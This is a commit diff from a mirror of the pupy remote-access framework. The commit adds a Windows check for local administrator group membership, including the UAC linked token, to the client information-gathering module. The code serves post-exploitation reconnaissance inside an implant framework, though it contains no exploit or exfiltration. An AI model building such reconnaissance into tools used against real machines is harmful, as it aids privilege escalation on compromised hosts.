mirror of https://github.com/n1nj4sec/pupy.git
Shows if user is in local admin grp in get_info module
This commit is contained in:
quentinhardy
parent
6dd52fbbe7
commit
df59c0e101
|
|
@ -6,6 +6,7 @@ __class_name__="GetInfo"
|
||||||
@config(cat="gather")
|
@config(cat="gather")
|
||||||
class GetInfo(PupyModule):
|
class GetInfo(PupyModule):
|
||||||
""" get some informations about one or multiple clients """
|
""" get some informations about one or multiple clients """
|
||||||
|
dependencies=["psutil", "pupwinutils.security"]
|
||||||
def init_argparse(self):
|
def init_argparse(self):
|
||||||
self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__)
|
self.arg_parser = PupyArgumentParser(prog='get_info', description=self.__doc__)
|
||||||
#self.arg_parser.add_argument('arguments', nargs='+', metavar='<command>')
|
#self.arg_parser.add_argument('arguments', nargs='+', metavar='<command>')
|
||||||
|
|
@ -21,6 +22,14 @@ class GetInfo(PupyModule):
|
||||||
if self.client.is_windows():
|
if self.client.is_windows():
|
||||||
for k in windKeys:
|
for k in windKeys:
|
||||||
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
||||||
|
currentUserIsLocalAdmin = self.client.conn.modules["pupwinutils.security"].can_get_admin_access()
|
||||||
|
desc = "local_adm"
|
||||||
|
if currentUserIsLocalAdmin == True:
|
||||||
|
infos+="{:<10}: {}\n".format(desc,"Yes")
|
||||||
|
elif currentUserIsLocalAdmin == False:
|
||||||
|
infos+="{:<10}: {}\n".format(desc,"No")
|
||||||
|
else:
|
||||||
|
infos+="{:<10}: {}\n".format(desc,"?")
|
||||||
elif self.client.is_linux():
|
elif self.client.is_linux():
|
||||||
for k in linuxKeys:
|
for k in linuxKeys:
|
||||||
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
infos+="{:<10}: {}\n".format(k,self.client.desc[k])
|
||||||
|
|
|
||||||
|
|
@ -473,3 +473,62 @@ def get_currents_privs():
|
||||||
privileges = ctypes.cast(buffer, ctypes.POINTER(TOKEN_PRIVS)).contents
|
privileges = ctypes.cast(buffer, ctypes.POINTER(TOKEN_PRIVS)).contents
|
||||||
return privileges
|
return privileges
|
||||||
|
|
||||||
|
def can_get_admin_access():
|
||||||
|
"""
|
||||||
|
Check if the user may be able to get administrator access.
|
||||||
|
Returns True if the user is in the administrator's group.
|
||||||
|
Otherwise returns False
|
||||||
|
"""
|
||||||
|
SECURITY_MAX_SID_SIZE = 68
|
||||||
|
WinBuiltinAdministratorsSid = 26
|
||||||
|
ERROR_NO_SUCH_LOGON_SESSION = 1312
|
||||||
|
ERROR_PRIVILEGE_NOT_HELD = 1314
|
||||||
|
TokenLinkedToken = 19
|
||||||
|
# On XP or lower this is equivalent to has_root()
|
||||||
|
if sys.getwindowsversion()[0] < 6:
|
||||||
|
return bool(ctypes.windll.shell32.IsUserAnAdmin())
|
||||||
|
# On Vista or higher, there's the whole UAC token-splitting thing.
|
||||||
|
# Many thanks for Junfeng Zhang for the workflow: htttp://blogs.msdn.com/junfeng/archive/2007/01/26/how-to-tell-if-the-current-user-is-in-administrators-group-programmatically.aspx
|
||||||
|
proc = ctypes.windll.kernel32.GetCurrentProcess()
|
||||||
|
# Get the token for the current process.
|
||||||
|
try:
|
||||||
|
token = ctypes.wintypes.HANDLE()
|
||||||
|
ctypes.windll.advapi32.OpenProcessToken(proc,TOKEN_QUERY,byref(token))
|
||||||
|
try:
|
||||||
|
# Get the administrators SID.
|
||||||
|
sid = ctypes.create_string_buffer(SECURITY_MAX_SID_SIZE)
|
||||||
|
sz = ctypes.wintypes.DWORD(SECURITY_MAX_SID_SIZE)
|
||||||
|
target_sid = WinBuiltinAdministratorsSid
|
||||||
|
ctypes.windll.advapi32.CreateWellKnownSid(target_sid,None,byref(sid),byref(sz))
|
||||||
|
# Check whether the token has that SID directly.
|
||||||
|
has_admin = ctypes.wintypes.BOOL()
|
||||||
|
ctypes.windll.advapi32.CheckTokenMembership(None,byref(sid),byref(has_admin))
|
||||||
|
if has_admin.value:
|
||||||
|
return True
|
||||||
|
# Get the linked token. Failure may mean no linked token.
|
||||||
|
lToken = ctypes.wintypes.HANDLE()
|
||||||
|
try:
|
||||||
|
cls = TokenLinkedToken
|
||||||
|
ctypes.windll.advapi32.GetTokenInformation(token,cls,byref(lToken),sizeof(lToken),byref(sz))
|
||||||
|
except WindowsError, e:
|
||||||
|
if e.winerror == ERROR_NO_SUCH_LOGON_SESSION:
|
||||||
|
return False
|
||||||
|
elif e.winerror == ERROR_PRIVILEGE_NOT_HELD:
|
||||||
|
return False
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
# Check if the linked token has the admin SID
|
||||||
|
try:
|
||||||
|
ctypes.windll.advapi32.CheckTokenMembership(lToken,byref(sid),byref(has_admin))
|
||||||
|
return bool(has_admin.value)
|
||||||
|
finally:
|
||||||
|
ctypes.windll.kernel32.CloseHandle(lToken)
|
||||||
|
finally:
|
||||||
|
ctypes.windll.kernel32.CloseHandle(token)
|
||||||
|
except Exception,e:
|
||||||
|
return None
|
||||||
|
finally:
|
||||||
|
try:
|
||||||
|
ctypes.windll.kernel32.CloseHandle(proc)
|
||||||
|
except Exception,e:
|
||||||
|
pass
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue